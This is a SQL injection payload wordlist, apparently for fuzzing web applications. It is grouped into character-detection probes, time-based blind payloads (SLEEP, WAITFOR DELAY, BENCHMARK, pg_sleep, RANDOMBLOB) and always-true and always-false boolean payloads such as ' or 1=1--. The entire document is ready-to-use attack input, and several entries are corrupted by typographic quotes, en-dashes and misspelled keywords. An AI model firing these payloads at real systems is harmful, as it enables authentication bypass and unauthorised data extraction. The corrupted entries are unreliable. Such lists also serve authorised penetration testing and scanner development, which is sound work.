# Basic character detection
" "
" #
" --
"&"
"*"
"-"
"/*
"^"
#
'
'  ='
' #
' '
' --
' –
'#
'&'
'*'
'-'
'--
'/*
'^'
=
==


# Sleep statements
sleep(5)#
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AnD SLEEP(5) ANd '1
'&&SLEEP(5)&&'1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/

# True statements

1=1
1=1--
'1='1
'1='2
1′)'1′='1–
'  'oe'='oe
'  'oe'='oe–
" or "" "
" or ""&"
" or ""*"
" or ""-"
" or ""="
" or ""^"
") or (""="
' or '' '
' or ''&'
' or ''*'
' or ''-'
' or ''='
' or ''^'
' or =--
' or =–
') or (''='
'="or'
 or 0=0 #
 or 0=0 --
 or 0=0 –
" or 0=0 #
" or 0=0 --
" or 0=0 –
%' or '0'='0
' or         0=0 #
' or 0=0 #
' or 0=0 --
' or 0=0 –
 or 1=1
 or 1=1#
 or 1=1--
 or 1=1/*
 or 1=1–
" or "1"="1
" or "1"="1"#
" or "1"="1"--
" or "1"="1"/*
" or 1=1
" or 1=1 --
" or 1=1 –
" or 1=1#
" or 1=1--
" or 1=1/*
" or 1=1–
") or "1"="1
") or "1"="1"#
") or "1"="1"--
") or "1"="1"/*
") or ("1"="1
") or ("1"="1"#
") or ("1"="1"--
") or ("1"="1"/*
' or '1'='1
' or '1'='1'#
' or '1'='1'--
' or '1'='1'/*
' or '1′='1
' or 1=1
' or 1=1 --
' or 1=1 –
' or 1=1#
' or 1=1--
' or 1=1/*
' or 1=1;#
' or 1=1–
') or '1'='1
') or '1'='1'#
') or '1'='1'--
') or '1'='1'/*
') or '1'='1--
') or ('1'='1
') or ('1'='1'#
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1--
'or'1=1
'or'1=1′
) or '1′='1–
) or ('1′='1–
or 1=1
or 1=1#
or 1=1--
or 1=1/*
' or 1=1 LIMIT 1;#
' or 1=1 lt 1 -- -+
"or 1=1 or ""="
'or 1=1 or ''='
') or (''='  h") or (""="
' or 'oe'='oe
' or 'oe'='oe–
'=' 'or'  '=' 'or'
 or true
" or true--
") or true--
' or true--
') or true--
or true--
' or ue lke '%
' or u lke '%
' or usere lke '%
' or user lke '%
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 'x'='x
') or ('x')=('x
') or ('x'='x
')) or (('x'))=(('x
' OR 'x'='x'#;

# False statement

1=2
1=2--
'1='2
1′)'1′='2–
'  'oe'='oa
'  'oe'='oa–
") or (""="
') or (''='
'="or'
 or 0=1 #
 or 0=1 --
 or 0=1 –
" or 0=1 #
" or 0=1 --
" or 0=1 –
%' or '0'='1
' or         0=1 #
' or 0=1 #
' or 0=1 --
' or 0=1 –
 or 1=2
 or 1=2#
 or 1=2--
 or 1=2/*
 or 1=2–
" or "1"="2
" or "1"="2"#
" or "1"="2"--
" or "1"="2"/*
" or 1=2
" or 1=2 --
" or 1=2 –
" or 1=2#
" or 1=2--
" or 1=2/*
" or 1=2–
") or "1"="2
") or "1"="2"#
") or "1"="2"--
") or "1"="2"/*
") or ("1"="2
") or ("1"="2"#
") or ("1"="2"--
") or ("1"="2"/*
' or '1'='2
' or '1'='2'#
' or '1'='2'--
' or '1'='2'/*
' or '1′='2
' or 1=2
' or 1=2 --
' or 1=2 –
' or 1=2#
' or 1=2--
' or 1=2/*
' or 1=2;#
' or 1=2–
') or '1'='2
') or '1'='2'#
') or '1'='2'--
') or '1'='2'/*
') or '1'='2--
') or ('1'='2
') or ('1'='2'#
') or ('1'='2'--
') or ('1'='2'/*
') or ('1'='2--
'or'1=2
'or'1=2′
) or '1′='2–
) or ('1′='2–
or 1=2
or 1=2#
or 1=2--
or 1=2/*
' or 1=2 LIMIT 1;#
' or 1=2 lt 1 -- -+
"or 1=2 or ""="
'or 1=2 or ''='
') or (''='  h") or (""="
' or 'oe'='oa
' or 'oe'='oa–
'=' 'or'  '=' 'or'
 or false
" or false--
") or false--
' or false--
') or false--
or false--
' or ue lke 'a%
' or u lke 'a%
' or usere lke 'a%
' or user lke 'a%
" or "x"="y
") or ("x")=("y
")) or (("x"))=(("y
' or 'x'='y
') or ('x')=('y
') or ('x'='y
')) or (('x'))=(('y
' OR 'x'='y'#;
